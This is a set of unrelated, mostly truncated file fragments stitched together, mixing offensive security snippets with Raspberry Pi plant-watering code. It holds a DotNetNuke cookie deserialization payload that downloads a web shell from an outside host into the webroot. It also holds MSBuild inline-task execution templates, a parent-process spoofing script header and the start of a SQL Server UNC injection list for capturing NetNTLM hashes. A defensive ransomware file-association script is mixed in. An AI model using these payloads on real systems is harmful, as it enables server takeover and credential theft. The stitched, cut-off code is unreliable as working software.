unbaiat

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="DemoClass">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
      <Code Type="Class" Language="cs">

unbaiat

import requests
import sys
from bs4 import BeautifulSoup
import json
import re

def sanitize_data(data):
    return data.replace('\r\n', '').replace('\n', '').replace('  ', '').replace(' ', '')

if len(sys.argv) < 2:

unbaiat

DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us

unbaiat

::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) 
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"

unbaiat

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="NotSubTee">
   <BusinessTime />
  </Target>
<UsingTask
    TaskName="BusinessTime"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>

unbaiat

<#

$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

#>

#Simple powershell/C# to spawn a process under a different parent process
#Launch PowerShell As Administrator

unbaiat

# External module imp
import RPi.GPIO as GPIO
import datetime
import time

init = False

GPIO.setmode(GPIO.BOARD) # Broadcom pin-numbering scheme

def get_last_watered():

unbaiat

import water

if __name__ == "__main__":
    water.auto_water()

unbaiat

<!DOCTYPE html>
<head>
  <title>{{ title }}</title>
</head>

<body>
  <h1>PLANT HELPLINE</h1>
  <h2>The date and time on the server is: {{ time }}</h2>
  <h2> {{ text }} </h2>
  <a href="/auto/water/ON"><button>Turn ON Auto Watering</button></a>

unbaiat

This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account 
has sysadmin privileges by default in all versions of SQL Server.

Note: This list is most likely not complete.

-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role 
-----------------------------------------------------------------------